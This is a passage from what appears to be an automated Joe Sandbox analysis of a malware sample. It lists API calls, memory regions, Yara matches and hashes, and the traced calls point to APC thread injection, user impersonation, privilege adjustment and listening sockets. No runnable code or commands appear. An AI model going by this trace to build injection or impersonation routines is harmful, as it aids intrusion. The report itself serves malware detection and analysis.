                                                                    • Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
                                                                    • Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
                                                                    • Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
                                                                    • Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308
                                                                  • _snprintf.LIBCMT ref: 00679267
                                                                    • Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
                                                                    • Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E
                                                                  • FindFirstFileA.KERNEL32 ref: 00679272
                                                                  • free.LIBCMT ref: 0067927E
                                                                    • Part of subcall function 0067F244: HeapFree.KERNEL32 ref: 0067F25A
                                                                    • Part of subcall function 0067F244: _errno.LIBCMT ref: 0067F264
                                                                    • Part of subcall function 0067F244: GetLastError.KERNEL32 ref: 0067F26C
                                                                  • malloc.LIBCMT ref: 006792CE
                                                                  • _snprintf.LIBCMT ref: 006792E6
                                                                  • free.LIBCMT ref: 0067930E
                                                                  • FindNextFileA.KERNEL32 ref: 00679327
                                                                  • FindClose.KERNEL32 ref: 00679338
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                                                  • String ID: %s\*
                                                                  • API String ID: 2620626937-766152087
                                                                  • Opcode ID: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                                  • Instruction ID: b9f7dc96f4b337169066c32773aa2e023003f420f908839e69a4b092d4227770
                                                                  • Opcode Fuzzy Hash: cc893efac870e389c3214beb74474689fb7507946bb50414294d16208cc1c1d7
                                                                  • Instruction Fuzzy Hash: 5831D5113046C255DA15AB636C207B97BA7B74AFE0F88C125DEED0BB96CE39C563C314
                                                                  APIs
                                                                  • RtlCaptureContext.KERNEL32 ref: 00401A84
                                                                  • RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
                                                                  • RtlVirtualUnwind.KERNEL32 ref: 00401ADD
                                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
                                                                  • UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
                                                                  • GetCurrentProcess.KERNEL32 ref: 00401B34
                                                                  • TerminateProcess.KERNEL32 ref: 00401B42
                                                                  • abort.MSVCRT ref: 00401B48
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                  • String ID: @5E
                                                                  • API String ID: 4278921479-727458683
                                                                  • Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                                                                  • Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
                                                                  • Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
                                                                  • Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32 ref: 00673ACE
                                                                  • GetProcAddress.KERNEL32 ref: 00673ADE
                                                                    • Part of subcall function 00673984: malloc.LIBCMT ref: 006739C2
                                                                    • Part of subcall function 00673984: free.LIBCMT ref: 00673A45
                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00673B10
                                                                  • Thread32Next.KERNEL32 ref: 00673B7A
                                                                  • Sleep.KERNEL32 ref: 00673B90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressCreateHandleModuleNextProcSleepSnapshotThread32Toolhelp32freemalloc
                                                                  • String ID: NtQueueApcThread$ntdll
                                                                  • API String ID: 1427994231-1374908105
                                                                  • Opcode ID: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                                  • Instruction ID: 173fb5629102f313e9d9874a9f15bb623e96bfa68c595a2679f6e732873ab5c7
                                                                  • Opcode Fuzzy Hash: 4682eb5fa987184764bf2e500015da157d39ace14d4a97c914713ac55f463483
                                                                  • Instruction Fuzzy Hash: 1A418B32701B519AEB20CB62E8407ED73B6FB58B88F54812ADE4D97B18EF39C645C744
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: bindclosesockethtonsioctlsocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1767165869-0
                                                                  • Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                                  • Instruction ID: 20277dcdf1c343fd712384b8841c0a27075375c39bd243faa5f60102d07d7b9e
                                                                  • Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
                                                                  • Instruction Fuzzy Hash: 89112631310B5482DB248F16E420359B762F788FA4F858634EE5E53B64CF3DD456C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                                                  • String ID:
                                                                  • API String ID: 3910169428-0
                                                                  • Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                                  • Instruction ID: d8364017e29b8a6f0fc31d9fb4209b82eade7849c5e9f444018a36658612b3d4
                                                                  • Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
                                                                  • Instruction Fuzzy Hash: 0111B135311B4097D7249F21E8243997762F788BA4F958239DE1A43794DF3DC95AC740
                                                                  APIs
                                                                    • Part of subcall function 0067DCC0: RevertToSelf.ADVAPI32 ref: 0067DCDD
                                                                  • LogonUserA.ADVAPI32 ref: 0067DF98
                                                                  • GetLastError.KERNEL32 ref: 0067DFA2
                                                                    • Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008
                                                                    • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
                                                                    • Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9
                                                                    • Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057
                                                                  • ImpersonateLoggedOnUser.ADVAPI32 ref: 0067DFC0
                                                                  • GetLastError.KERNEL32 ref: 0067DFCA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
                                                                  • String ID: %s\%s
                                                                  • API String ID: 3621627092-4073750446
                                                                  • Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                                  • Instruction ID: c23be3ee67aa09ac1aac6bdd0082120723da9cefab7562a0a514cdcd65bd2716
                                                                  • Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
                                                                  • Instruction Fuzzy Hash: 1A318B30314B4191EB40FB22F86435A23A7FB8AB80F804029EA4E57F66DF3EC165CB45
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountSleepTick$closesocket
                                                                  • String ID:
                                                                  • API String ID: 2363407838-0
                                                                  • Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                                  • Instruction ID: 225c3144836ed55f75402d078613cef5556b0c92f46d9bf16291872aee3931d8
                                                                  • Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
                                                                  • Instruction Fuzzy Hash: A711D221704A8092CA50EB62F45521AA392F785BF0F444735FEBE47BE6DE3CC6468B45
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                                                                  • GetCurrentProcessId.KERNEL32 ref: 004019E0
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004019E8
                                                                  • GetTickCount.KERNEL32 ref: 004019F0
                                                                  • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                                                                  • Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
                                                                  • Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
                                                                  • Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: bindclosesockethtonslistensocket
                                                                  • String ID:
                                                                  • API String ID: 564772725-0
                                                                  • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                                  • Instruction ID: 7639010fca12233a93f18edaacb0714942ccd48183b1a2ce934c52e116504c89
                                                                  • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                                                                  • Instruction Fuzzy Hash: 8D110435614B5582DB20EF12E82531AB362F788FE0F548665EE9D07FA4DF7EC1198704
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: %s!%s
                                                                  • API String ID: 0-2935588013
                                                                  • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                                  • Instruction ID: 339d4963c7e48f7d5eab9816edd3ce58a4595f6ab105ea75f3ca995b74269556
                                                                  • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                                                                  • Instruction Fuzzy Hash: A2518D76B04A80C6DB24DF66D0406A97362F388FD8F84852AEF8E57758DF38C942C744
                                                                  APIs
                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 00670BEA
                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00670C1A
                                                                  • GetLastError.KERNEL32 ref: 00670C24
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                  • String ID: %s
                                                                  • API String ID: 4244140340-620797490
                                                                  • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                                  • Instruction ID: 2d8aa08465468c05ae3a8d0ae3c732c9e61822b2c26229a58da37efd2c490324
                                                                  • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                                                                  • Instruction Fuzzy Hash: 8C217C72B00B01AAEB14DB71D4557ED73B6F758B88F84852A9E4C93B48EF74C629C390
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0067587B
                                                                  • Sleep.KERNEL32 ref: 006758CA
                                                                  • GetTickCount.KERNEL32 ref: 006758D0
                                                                  • WSAGetLastError.WS2_32 ref: 006758DA
                                                                    • Part of subcall function 00675A20: ioctlsocket.WS2_32 ref: 00675A42
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CountTick$ErrorLastSleepioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 1121440892-0
                                                                  • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                                  • Instruction ID: fcd2c79b4b1f667fb8cce6bcefae5cc02d7a34ed8ad0a29df97c4b622c4aa0d8
                                                                  • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                                                                  • Instruction Fuzzy Hash: 77316B36B00F40D6DB00DBA2E4942AC77BAF388B90F51466ADE6E93B94DE31C555C344
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $<$ailure #%d - %s$e '
                                                                  • API String ID: 0-963976815
                                                                  • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                  • Instruction ID: 875dd6fd0587a974ac1acf23bae3dc22a9181987aed168fd786f8758df7145ac
                                                                  • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                  • Instruction Fuzzy Hash: 7D92D3B2329A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB44
                                                                  APIs
                                                                    • Part of subcall function 00676114: htonl.WS2_32 ref: 00676131
                                                                  • GetLastError.KERNEL32 ref: 0066DD33
                                                                    • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                                                                  • HeapCreate.KERNEL32 ref: 0066DCDA
                                                                  • HeapAlloc.KERNEL32 ref: 0066DCF8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                                                                  • String ID:
                                                                  • API String ID: 3419463915-0
                                                                  • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                                  • Instruction ID: 52fe5b68eb4c93ed57c1751ba93f5dd3d32ebf759edd96eaf3318f5250c8f75b
                                                                  • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                                                                  • Instruction Fuzzy Hash: 21E1B1B3B10B4187EB64DB35E8413AA63A2F799794F088125DB8E97B55EF3DE446C300
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd
                                                                  Similarity
                                                                  • API ID: signal
                                                                  • String ID:
                                                                  • API String ID: 1946981877-0
                                                                  • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                                                                  • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                                                                  • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                                                                  • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $<
                                                                  • API String ID: 0-428540627
                                                                  • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                  • Instruction ID: 029e6c0c50f8178ac7a0873f28322fe44d81e9b0db15bd0f8f991eaa75d97d41
                                                                  • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                                                                  • Instruction Fuzzy Hash: DE92D1B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ailure #%d - %s$e '
                                                                  • API String ID: 0-4163927988
                                                                  • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                  • Instruction ID: ec6c28a2629b973ec245a2b5201f0cb2fca8ea9cd88e4a8d25ed745c8d90d11e
                                                                  • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                                                                  • Instruction Fuzzy Hash: A7510AB6214A508BD714CB09E4E076AB7E1F3CCB94F84561AE38B8B768DB3CD545CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                  • Instruction ID: 82b5d1063a700ef63de224473fde504350dfbea355db83ab48aaa914c7c492b6
                                                                  • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                  • Instruction Fuzzy Hash: 235241B221898587D708CB1CE4A177AB7E1F3C9B80F44852AE79B8B799CE3DD554DB00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                  • Instruction ID: bc1ccaeb1530266df738040eaae3fae955189e00e07f680a2e6a2761b34d835d
                                                                  • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                                                                  • Instruction Fuzzy Hash: 7E5250B22149458BD708CB1CE4A173AB7E2F3C9B80F44852AE7978BB99CE3DD555CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                  • Instruction ID: ce355b0243cb639f74432b96568eac3b2256156551a439938dfd84188c558197
                                                                  • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                  • Instruction Fuzzy Hash: CA5240B22149818BD708CF1DE4A177AB7E1F3C9B80F44852AE78A8B799CA3DD545CF40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                  • Instruction ID: 5164de9d090b26616ad0d3930c8619f64b1833a30633e82543ad9ecf93fad533
                                                                  • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                                                                  • Instruction Fuzzy Hash: 485255B22145808BD708CF1DE4A173AB7E2F3C9B80F44852AE7968BB99CA3DD555CF40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                                                  • Instruction ID: 0e5a797c056a3b603dc5714ecbf7d852c9887fbf52f5745a24cee88d7c1c311a
                                                                  • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                                                                  • Instruction Fuzzy Hash: 65E1D87A718A4296DF30DB25E4906AE73A1F7AA798F900115EF4D87748EF38CD85CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                                                                  • Instruction ID: 97788dc11d1859d5af95f783d0f149c7900d8f14816fea1324a533bb0f57b2cf
                                                                  • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                                                                  • Instruction Fuzzy Hash: ACE1D776318A4296DB20CBA5E4902AE67B3F795788F904115EF4DA7708EF39CE06CF41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                                  • Instruction ID: 478000ad0292b6d07a9389f9cf01eca55c7dab24efc3bc0c4dde27ee49546022
                                                                  • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                                                                  • Instruction Fuzzy Hash: D4E19CB6B10B4187EB24CB35E8413AA63A2F799795F488125DB8F97B51EF3CE485C340
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                                                  • Instruction ID: d57bf8e47affcda77c628be205ea94685852170c192f6ea003444fb5114afa0b
                                                                  • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                                                                  • Instruction Fuzzy Hash: 1ED1197B704B4292DF20DF65D8902AE6761FBE6798F900012EF4E97658EF34C986C740
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
